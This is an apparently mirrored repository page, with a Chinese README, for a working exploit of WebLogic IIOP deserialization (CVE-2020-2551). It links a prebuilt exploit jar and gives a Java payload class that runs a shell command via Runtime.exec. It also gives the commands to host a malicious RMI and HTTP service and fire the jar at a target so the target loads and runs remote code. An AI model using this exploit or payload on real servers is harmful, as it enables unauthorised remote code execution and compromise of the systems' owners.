# CVE-2020-2551 **Repository Path**: omg2019/CVE-2020-2551 ## Basic Information - **Project Name**: CVE-2020-2551 - **Description**: Weblogic IIOP CVE-2020-2551 - **Primary Language**: Unknown - **License**: Not specified - **Default Branch**: master - **Homepage**: None - **GVP Project**: No ## Statistics - **Stars**: 0 - **Forks**: 0 - **Created**: 2020-12-08 - **Last Updated**: 2020-12-19 ## Categories & Tags **Categories**: Uncategorized **Tags**: None ## README ## CVE-2020-2551 Weblogic IIOP 反序列化 ## 测试环境 Weblogic10.3.6+jdk1.6 [打包好的jar包](https://pan.baidu.com/s/1WancKEtKzXDxwWP0zz3QPg) 提取码:a6ob ## 漏洞利用 下载jar包,然后使用marshalsec起一个恶意的RMI服务,本地编译一个exp.java ```java package payload; import java.io.IOException; public class exp { public exp() { String cmd = "curl http://172.16.1.1/success"; try { Runtime.getRuntime().exec(cmd).getInputStream(); } catch (IOException e) { e.printStackTrace(); } } } ``` **尽量使用和weblogic相同的jdk版本和依赖库(wlfullclient.jar)编译** 然后本地起一个web服务器 ``` python -m http.server --bind 0.0.0.0 80 ``` 命令行运行jar包 ``` java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp ``` 实际效果如图 ![image](https://user-images.githubusercontent.com/40487319/75524749-81804100-5a49-11ea-8409-20746ca09299.gif) ## 已知问题 很多小伙伴都说复现不成功,看了网上的一些文章发现IIOP存在nat模式的问题,今天发现先知上有了 https://xz.aliyun.com/t/7498 各位自行移步。 ## 参考 https://y4er.com/post/weblogic-cve-2020-2551/